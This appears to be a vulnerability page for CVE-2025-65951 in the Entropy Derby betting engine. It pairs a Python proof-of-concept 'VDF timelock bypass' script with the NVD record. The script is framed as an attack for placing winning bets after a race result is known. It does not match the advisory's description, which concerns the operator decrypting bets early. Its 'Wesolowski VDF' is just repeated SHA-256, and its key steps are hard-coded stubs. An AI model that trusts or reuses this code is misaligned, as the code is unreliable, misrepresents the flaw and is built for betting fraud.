CVE-2025-65951

# CVE-2025-65951 PoC - VDF Timelock Bypass # Attack: Pre-compute VDF output and bypass timelock encryption import hashlib import json import requests from web3 import Web3 class EntropyDerbyVDFBypass: def __init__(self, contract_address, rpc_url): self.w3 = Web3(Web3.HTTPProvider(rpc_url)) self.contract_address = contract_address def precompute_vdf(self, bet_id, challenge, iterations=1000000): """Pre-compute the Wesolowski VDF output before the race result is known. In practice, this can be done with the challenge hash before race starts.""" x = challenge.encode() for i in range(iterations): x = hashlib.sha256(x + str(i).encode()).digest() return x.hex() def construct_exploit_ticket(self, race_id, bet_amount, selected_horse, vdf_output, secret_nonce): """Construct a malicious bet ticket with pre-computed VDF output.""" ticket = { "race_id": race_id, "bet_amount": bet_amount, "selected_horse": selected_horse, "vdf_output_hex": vdf_output, "secret_nonce": secret_nonce, "timestamp": self.w3.eth.get_block('latest').timestamp } return json.dumps(ticket) def exploit(self, race_id, bet_amount, selected_horse, challenge): """ 1. Pre-compute VDF output with known challenge 2. Wait for race result (optional - in real attack, timing matters) 3. If favorable result, submit ticket with pre-computed VDF 4. House verifies VDF quickly (bypassing actual delay) 5. Bet is accepted as if submitted before race """ # Step 1: Pre-compute VDF vdf_output = self.precompute_vdf(race_id, challenge) # Step 2: Wait for race result (simulated) race_result = self.get_race_result(race_id) # Step 3: If favorable, exploit if self.is_favorable(race_result, selected_horse): ticket = self.construct_exploit_ticket( race_id, bet_amount, selected_horse, vdf_output, "nonce" ) # Submit to contract - will pass VDF verification immediately tx_hash = self.submit_bet(ticket) return {"status": "exploited", "tx": tx_hash} return {"status": "no_exploit_needed"} def get_race_result(self, race_id): """Fetch race result from oracle.""" return "horse_7" # Simulated def is_favorable(self, result, bet): """Check if bet is winning.""" return result == bet def submit_bet(self, ticket): """Submit bet to smart contract.""" # Implementation depends on contract ABI return "0x..."

{"cve": {"id": "CVE-2025-65951", "sourceIdentifier": "[email protected]", "published": "2025-11-25T01:15:46.800", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Inside Track / Entropy Derby is a research-grade horse-racing betting engine. Prior to commit 2d38d2f, the VDF-based timelock encryption system fails to enforce sequential delay against the betting operator. Bettors pre-compute the entire Wesolowski VDF and include vdfOutputHex in their encrypted bet ticket, allowing the house to decrypt immediately using fast proof verification instead of expensive VDF evaluation. This issue has been patched via commit 2d38d2f."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:N", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 5.8}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}, {"lang": "en", "value": "CWE-327"}]}], "references": [{"url": "https://github.com/mescuwa/entropy-derby/commit/2d38d2f16bbb3b4240698148f80d8c5202725c77", "source": "[email protected]"}, {"url": "https://github.com/mescuwa/entropy-derby/security/advisories/GHSA-pm54-f847-w4mh", "source": "[email protected]"}]}}